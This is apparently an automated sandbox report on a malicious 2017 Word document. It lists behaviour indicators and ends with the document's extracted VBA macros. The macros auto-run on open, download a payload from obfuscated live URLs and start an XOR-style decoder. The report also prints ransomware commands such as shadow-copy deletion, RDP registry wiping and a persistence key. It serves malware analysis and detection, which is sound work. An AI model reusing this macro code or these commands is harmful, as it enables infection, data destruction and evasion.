5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.docx.000
This report is generated from a file or URL submitted to this webservice on July 26th 2017 18:31:52 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v6.80 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
  - Contains a remote desktop related string
  - Sets terminal service related keys (often RDP related)
- Ransomware
  - Deletes volume snapshots (often used by ransomware)
  - The analysis extracted a known ransomware file
- Persistence
  - Modifies auto-execute functionality by setting/creating a value in the registry
  - Spawns a lot of processes
  - Writes data to a remote process
- Fingerprint
  - Reads the active computer name
  - Reads the cryptographic machine GUID
- Evasive
  - Possibly checks for the presence of an Antivirus engine
- Network Behavior
  - Contacts 1 domain and 1 host.
Indicators
Not all malicious and suspicious indicators are displayed.
-
Malicious Indicators 21
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET TROJAN Known Malicious Doc Downloading Payload Dec 06 2016" (SID: 2023583, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source
- Suricata Alerts
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines
- details
- 6/65 reputation engines marked "http://e-snhv.com" as malicious (9% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 11/59 Antivirus vendors marked sample as malicious (18% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 11/59 Antivirus vendors marked sample as malicious (18% detection rate)
- source
- External System
- relevance
- 8/10
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
- "GET /hjbgtg67 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept-Encoding: gzip, deflate
Host: e-snhv.com
Connection: Keep-Alive"
- source
- Network Traffic
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
- 10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3492) as malicious (classified as "ML.Attribute" with 16% detection rate)
- 10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3448) as malicious (classified as "ML.Attribute" with 16% detection rate)
- 10/62 Antivirus vendors marked spawned process "hurds8.exe" (PID: 3532) as malicious (classified as "ML.Attribute" with 16% detection rate)
- source
- Monitored Target
- relevance
- 10/10
-
Tries to delete registry keys using reg.exe
- details
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- source
- Monitored Target
- relevance
- 5/10
-
Installation/Persistence
-
Sets thread context in a remote process (often injection or process hollowing)
- details
- "hurds8.exe" set thread context in remote process "%TEMP%\hurds8.exe" (PID 00000dcc)
- source
- API Call
- relevance
- 10/10
-
Writes data to a remote process
- details
- "WINWORD.EXE" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
- "WINWORD.EXE" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
- "WINWORD.EXE" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 2064)
- "hurds8.exe" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
- "hurds8.exe" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
- "hurds8.exe" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 536)
- "hurds8.exe" wrote 32 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 52 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 4 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 1024 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 75776 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 23552 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 5120 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- "hurds8.exe" wrote 10752 bytes to a remote process "%TEMP%\hurds8.exe" (Handle: 236)
- source
- API Call
- relevance
- 6/10
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
- Found malicious artifacts related to "61.106.62.37" (ASN: , Owner: ): ...
- URL: http://e-snhv.com/ (AV positives: 6/65 scanned on 07/25/2017 18:00:56)
- URL: http://e-snhv.com/83b7bf3/ (AV positives: 7/65 scanned on 07/22/2017 13:45:20)
- URL: http://e-snhv.com/38rh76f/ (AV positives: 7/65 scanned on 07/22/2017 10:04:31)
- URL: http://e-snhv.com/6gfh33/ (AV positives: 5/65 scanned on 07/21/2017 15:51:52)
- URL: http://e-snhv.com/38rh76f (AV positives: 8/65 scanned on 07/20/2017 06:15:39)
- File SHA256: 6d5ed92cf8897c97293d7da272adc2f9b3c9f6bf4c4d568acadc4b8c10170b37 (AV positives: 1/58 scanned on 07/19/2017 15:08:56)
- File SHA256: 68c7b7d97fada3f558a54260491ffe1ce77add158f8a91c2599432f13718b807 (AV positives: 5/56 scanned on 06/06/2017 03:56:43)
- File SHA256: 98f0f68feb0495de61add43c717ccb462fbe46bc977bb295c688bd4511272b55 (AV positives: 5/56 scanned on 06/04/2017 20:48:24)
- source
- Network Traffic
- relevance
- 10/10
-
Ransomware/Banking
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a known ransomware file
- details
- Found dropped filename "_ReadMe_.txt" which has been seen in the context of ransomware (Indicator: README_.txt)
- source
- Binary File
- relevance
- 5/10
-
Remote Access Related
-
Sets terminal service related keys (often RDP related)
- details
- "reg.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS")
- "reg.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS"; Key: "(DEFAULT)"; Value: "0000")
- source
- Registry Access
- relevance
- 3/10
-
System Destruction
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- source
- Monitored Target
- relevance
- 10/10
-
System Security
-
Tries to delete registry keys using reg.exe
- details
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- source
- Monitored Target
- relevance
- 5/10
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Spawns a lot of processes
- details
- Spawned process "WINWORD.EXE" with commandline "/n "C:\5a48573d87189b07a59908e6b476618195de82f9106b4268991d231b1e3a5faf.doc"
- Spawned process "hurds8.exe"
- Spawned process "hurds8.exe" with commandline "-l"
- Spawned process "hurds8.exe"
- Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t6D8E.tmp.bat"
- Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
- Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t773C.tmp.bat"
- Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\tmp7751.tmp.bat"
- Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet"
- Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f""
- Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f""
- Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"""
- Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- source
- Monitored Target
- relevance
- 8/10
-
Hiding 3 Malicious Indicators
-
Suspicious Indicators 19
-
Anti-Detection/Stealthiness
-
Possibly checks for the presence of an Antivirus engine
- details
- "COMODO" (Indicator: "comodo")
- "Kaspersky Lab" (Indicator: "kaspersky")
- "McAfee" (Indicator: "mcafee")
- "Avira" (Indicator: "avira")
- "Avast" (Indicator: "avast")
- "Symantec" (Indicator: "symantec")
- source
- File/Memory
- relevance
- 3/10
-
Cryptographic Related
-
Found a cryptographic related string
- details
- "DES" (Indicator: "des"; File: "00014991-00003492.00000000.15495.00401000.00000040.mdmp")
- source
- File/Memory
- relevance
- 10/10
-
Environment Awareness
-
Reads the active computer name
- details
- "WINWORD.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- "hurds8.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- "vssadmin.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
-
Reads the cryptographic machine GUID
- details
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- "hurds8.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- "vssadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source
- Registry Access
- relevance
- 10/10
-
Exploit/Shellcode
-
Found URL in decoded VBA string
- details
- Heuristic match: "e-snhv.com"
- Heuristic match: "hjbgtg67CHAStrominguatedrop.org"
- Heuristic match: "hjbgtg67CHASswangroup.net"
- Heuristic match: "Playe.rs"
- Heuristic match: "TileG.et"
- source
- File/Memory
- relevance
- 10/10
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 6/65 reputation engines marked "http://e-snhv.com" as malicious (9% detection rate)
- source
- External System
- relevance
- 10/10
-
General
-
Contains ability to find and load resources of a specific module
- details
- FindResourceW@KERNEL32.DLL from hurds8.exe (PID: 3532)
- FindResourceW@KERNEL32.DLL from hurds8.exe (PID: 3532)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Installation/Persistence
-
Creates new processes
- details
- "WINWORD.EXE" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
- "hurds8.exe" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
- "hurds8.exe" is creating a new process (Name: "%TEMP%\hurds8.exe", Handle: )
- "hurds8.exe" is creating a new process (Handle: )
- "hurds8.exe" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: l)
- source
- API Call
- relevance
- 8/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
- "hurds8.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE")
- "hurds8.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"; Key: "CERTIFICATESCHECK"; Value: "%APPDATA%\Microsoft\SystemCertificates\My\Certificates\hurds8.exe")
- source
- Registry Access
- relevance
- 8/10
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
- source
- Network Traffic
- relevance
- 10/10
-
Ransomware/Banking
-
The analysis extracted file with a known ransomware suffix
- details
- Found dropped filename "dictionary.alcatel-lucent.aaa" which has been seen in the context of ransomware (Indicator: .aaa)
- source
- Binary File
- relevance
- 10/10
-
The input sample dropped very many files
- details
- The input sample dropped 2000 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
Remote Access Related
-
Changes the attributes of the Desktop.rdp configuration file
- details
- Process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- Process "attrib.exe" with commandline "attrib Default.rdp -s -h"
- source
- Monitored Target
- relevance
- 10/10
-
Contains a remote desktop related string
- details
- "^;Vgto@Wa&}FADbk4C&+Dl2RR<e vnc`eN" (Indicator for product: Generic VNC)
- source
- File/Memory
- relevance
- 10/10
-
Spyware/Information Retrieval
-
Contains ability to enumerate processes/modules/threads
- details
- CreateToolhelp32Snapshot@KERNEL32.DLL from hurds8.exe (PID: 3532)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
System Security
-
Modifies proxy settings
- details
- "hurds8.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- "hurds8.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- "hurds8.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
- Found suspicious keyword "Xor" which indicates: "May attempt to obfuscate specific strings"
- Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
- Found suspicious keyword "User-Agent" which indicates: "May download files from the Internet"
- Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
- Found suspicious keyword "Open" which indicates: "May open a file"
- Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
- source
- Static Parser
- relevance
- 10/10
-
Opens many files with write access (often indicator for full-system infection)
- details
- "hurds8.exe" opens more than 500 files with write access
- source
- API Call
- relevance
- 10/10
-
Informative 30
-
Anti-Detection/Stealthiness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "WINWORD.EXE" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3492)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3448)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3532)
- SetUnhandledExceptionFilter@KERNEL32.DLL from hurds8.exe (PID: 3532)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3492)
- GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3448)
- GetSystemTimeAsFileTime@KERNEL32.DLL from hurds8.exe (PID: 3532)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the machine version
- details
- GetVersionExA@KERNEL32.DLL from hurds8.exe (PID: 3492)
- GetVersionExA@KERNEL32.DLL from hurds8.exe (PID: 3448)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to query the system locale
- details
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492)
- GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3492)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3492)
- GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3492)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448)
- GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3448)
- GetUserDefaultLCID@KERNEL32.DLL from hurds8.exe (PID: 3448)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448)
- EnumSystemLocalesW@KERNEL32.DLL from hurds8.exe (PID: 3448)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Possibly tries to detect the presence of a debugger
- details
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3492)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3448)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- GetProcessHeap@KERNEL32.DLL from hurds8.exe (PID: 3532)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Reads the registry for installed applications
- details
- "WINWORD.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADDRESSBOOK")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\ADOBE FLASH PLAYER NPAPI")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\AUTOITV3")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CONNECTION MANAGER")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DIRECTDRAWEX")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\DXM_RUNTIME")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\FONTCORE")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE40")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE4DATA")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IE5BAKEX")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA0")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA1")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA10")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA100")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA101")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA102")
- "WINWORD.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\IEDATA103")
- source
- Registry Access
- relevance
- 10/10
-
General
-
Contacts domains
- details
- "e-snhv.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "61.106.62.37:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains PDB pathways
- details
-
"C:\Cpp\VS17\pchild10\Release\pchild10.pdb"
"$JC3v<!f:\CB\11X_Main\Acrobat\Installers\AbcpyDll\Release\AbcpyDll.pdbl|@l@4@L4DPL@4ll@@ (@Xhp@X@44@@P`4|@|PH4H@i*s+0fz{Ns>mD"`i"""""D4"xYc"""(@Lh)8H356"
":JB \uicf:\CB\11X_Main\Acrobat\Installers\AcroTgts\Release\AcroTgts.pdb@@(4DL(@4P|P@|l@@lXht@X@@@P\@@SN]OPPE^:^"P""("T,"p~""",P"X(LPZLlFcSceg%gj%nqs sttTPZ@"!%_fQg=6K [}Znpe9>]"0?_?iPed&ct!wXgjPZ#%!4!Mc98(U'L%FQ9u"*%B@3$" - source
- File/Memory
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Function Test_NormalUse_XPersist(aDocumentProperties) As Boolean
On Error GoTo Test_NormalUse_XPersist_Error
InfoMes.sage ("Test_NormalUse_XPersist ... [start]")
aDocumentProperties.read (cTestPath + "TestDebug_in.sdw")
ShowProp.erties (aDocumentProperties)
aDocumentProperties.Write (cTestPath + "TestDebug_Out.sdw")
aDocumentProperties.read (cTestPath + "TestDebug_Out.sdw")
ShowPro.perties (aDocumentProperties)
On Error GoTo 0
InfoMes.sage ("Test_NormalUse_XPersist ... [ende]")
Test_NormalUse_XPersist = cOK
Exit Function
Test_NormalUse_XPersist_Error:
On Error GoTo 0
ErrorM.essage ("Test_NormalUse_XPersist ... [Error]")
Test_NormalUse_XPersist = cError
Exit Function
End Function
Sub Document_Open()
BladeRunner_Fish = 0
HMBCP "Test_NormalUse_XPersist_Error"
End Sub"
File "Module2.bas" (Streampath: "VBA/Module2") has code: "Public MarkusPils() As String
Public BladeRunner_4 As String
Public Const BladeRunner_System = "User-Agent"
Public SubProperty As Object
Public BladeRunner_VEAM As Object
Public BladeRunner_Fish As Integer
Public AlertN() As String
Public AlertNE As String
Public BladeRunner_PokerFace As Variant
Public BladeRunner_aifde As Object
Public BladeRunner_FLAME As String
Public BladeRunner_avatar As Object
Public smbi As String
Public BladeRunner_2 As String
Public Const Quubo = 0
Public Stocke As Integer
Public BladeRunner_Project As String
Public VertikName As String
Public BladeRunner_PathTo2 As String
Public CofeeShop As Object
Public Sub AnimTransferMap(Caption As String, IsMapTransfer As Boolean)
Dim xt As Integer, yt As Integer, PValue As Integer, I As Integer, L As Long
Set BladeRunner_avatar = CreateObject(AlertN(3))
Shtefin = Replace(Replace("e-snhv.cLLOO\hjbgtg67CHAStrLLOOinguatedrop.org\af\hjbgtg67CHASswangroup.net\hjbgtg67", "LLOO", "om"), "\", "/")
MarkusPils = Split(Shtefin, F3.CHAS.Caption)
Set SubProperty = CreateObject(AlertN(1))
Set BladeRunner_aifde = CreateObject(AlertNE)
Set BladeRunner_VEAM = BladeRunner_avatar.Environment(AlertN(4))
Exit Sub
xt = CenterX - 77
yt = CenterY - 10
If IsMapTransfer Then
PValue = (ResX - 88) \ 12
L = UBound(RMData) \ PValue
For I = 1 To PValue
If I * L >= RMCount Then
Optio.nGFX "selectfalse", 32 + I * 12, CenterY + 200
Else
Optio.nGFX "selecttrue", 32 + I * 12, CenterY + 200
End If
Next
End If
End Sub
Public Sub AnimPowerup(pwr As Integer)
Dim rBuff As RECT
Dim ExX As Long, ExY As Long
If NewGTC - PowerFrameT(pwr) > 100 Then
PowerFrame(pwr) = PowerFrame(pwr) + 1
If PowerUp(pwr) = 1 Then
If PowerFrame(pwr) > 5 Then PowerFrame(pwr) = 0
Else
If PowerFrame(pwr) > 11 Then PowerFrame(pwr) = 0
End If
PowerFrameT(pwr) = NewGTC
End If
If PowerEffect(pwr) = 2 Then
If NewGTC - PowerTick(pwr) > 50 Then
PowerTick(pwr) = NewGTC
PowerEffect(pwr) = 3
Else
Exit Sub
End If
ElseIf PowerEffect(pwr) = 3 Then
If NewGTC - PowerTick(pwr) > 50 Then
PowerTick(pwr) = NewGTC
PowerEffect(pwr) = 2
Exit Sub
End If
End If
ExX = PowerX(pwr)
ExY = PowerY(pwr)
ExX = ExX - MeX: ExY = ExY - MeY
rBuff.Top = 355 + (PowerUp(pwr) - 1) * 24
rBuff.Bottom = rBuff.Top + 24
rBuff.Left = PowerFrame(pwr) * 24
rBuff.Right = rBuff.Left + 24
If ExX < 0 Then rBuff.Left = rBuff.Left + Abs(ExX): ExX = 0
If ExY < 0 Then rBuff.Top = rBuff.Top + Abs(ExY): ExY = 0
If ExX > ResX - 24 Then rBuff.Right = rBuff.Right - (ExX - (ResX - 24)): ExX = ResX - 24 + (ExX - (ResX - 24))
If ExY > ResY - 24 Then rBuff.Bottom = rBuff.Bottom - (ExY - (ResY - 24)): ExY = ResY - 24 + (ExY - (ResY - 24))
If PowerUp(pwr) <> 0 Then BackBuffer.BltFast ExX, ExY, DirectDraw_Tuna1, rBuff, DDBLTFAST_WAIT Or DDBLTFAST_SRCCOLORKEY
End Sub
Public Sub AnimExpl(I As Integer)
Dim xt As Integer, yt As Integer, rExpl As RECT
Dim sw As Integer, sh As Integer
Dim ExY As Integer
If NewGTC - AnimExT(I) > 50 Then
AnimExT(I) = NewGTC
AnimExF(I) = AnimExF(I) + 1
If AnimExF(I) > 10 Then
AnimExF(I) = 0
Expl(I) = False
Exit Sub
End If
End If
rExpl.Left = rBombExp(AnimExF(I)).Left
rExpl.Right = rBombExp(AnimExF(I)).Right
rExpl.Top = rBombExp(AnimExF(I)).Top
rExpl.Bottom = rBombExp(AnimExF(I)).Bottom
sw = rExpl.Right - rExpl.Left
sh = rExpl.Bottom - rExpl.Top
xt = ExplX(I) - MeX - (sw / 2)
yt = ExplY(I) - MeY - (sh / 2)
If xt < 0 Then rExpl.Left = rExpl.Left + Abs(xt): xt = 0
If yt < 0 Then rExpl.Top = rExpl.Top + Abs(yt): yt = 0
If xt > ResX - sw Then rExpl.Right = rExpl.Right - (xt - (ResX - sw)): xt = (ResX - sw) + (xt - (ResX - sw))
If yt > ResY - sh Then rExpl.Bottom = rExpl.Bottom - (yt - (yt - sh)): ExY = (yt - sh) + (yt - (ResY - sh))
End Sub
Public Function PuWord(lone() As Byte, ltwo As String)
Dim bskcp2 As Long
Dim bskcp3 As Long
Dim bskcp5 As Long
Dim bskcp6 As Long
Dim plusplus() As Byte
Dim bskcp4 As Long
Dim plusplusLen As Long
plusplusLen = Len(ltwo)
ReDim plusplus(plusplusLen)
plusplus = StrConv(ltwo, vbFromUnicode)
bskcp2 = UBound(lone) + 1
bskcp5 = bskcp2
For bskcp4 = _
0 To (bskcp2 - 1)
